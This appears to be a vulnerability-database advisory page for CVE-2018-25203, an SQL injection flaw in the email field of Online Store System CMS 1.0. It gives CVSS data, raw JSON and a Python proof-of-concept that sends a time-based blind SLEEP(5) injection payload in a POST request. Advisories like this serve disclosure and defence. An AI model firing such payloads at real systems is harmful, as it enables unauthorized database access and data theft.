Security Vulnerability Report
中文
CVE-2018-25203 CVSS 8.2 HIGH

CVE-2018-25203

Published: 2026-03-26 12:16:05
Last Modified: 2026-05-01 14:34:28
Source: [email protected]

Description

Online Store System CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with the action=clientaccess parameter using boolean-based blind or time-based blind SQL injection payloads in the email field to extract sensitive database information.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Online Store System CMS 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli(target_url): # Target endpoint based on the vulnerability description url = f"{target_url}/index.php" # Payload for time-based blind SQL injection # If the database pauses for 5 seconds, the vulnerability is confirmed payload = { "action": "clientaccess", "email": "[email protected]' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -" } try: print(f"Sending request to {url}...") response = requests.post(url, data=payload, timeout=10) # Check if the response time indicates a delay caused by SLEEP(5) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Response time delayed.") else: print("[-] Vulnerability not detected or response too fast.") except requests.RequestException as e: print(f"Error connecting to target: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://127.0.0.1" check_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25203", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:05.047", "lastModified": "2026-05-01T14:34:28.400", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Online Store System CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with the action=clientaccess parameter using boolean-based blind or time-based blind SQL injection payloads in the email field to extract sensitive database information."}, {"lang": "es", "value": "Sistema CMS de Tienda en Línea 1.0 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados manipular consultas de la base de datos inyectando código SQL a través del parámetro 'email'. Los atacantes pueden enviar solicitudes POST a index.php con el parámetro 'action=clientaccess' utilizando cargas útiles de inyección SQL ciega basada en booleanos o ciega basada en tiempo en el campo 'email' para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44719", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/online-store-system-cms-sql-injection-via-clientaccess", "source": "[email protected]"}, {"url": "https://www.wecodex.com/item/view/online-store-system-in-php-and-mysql/3", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.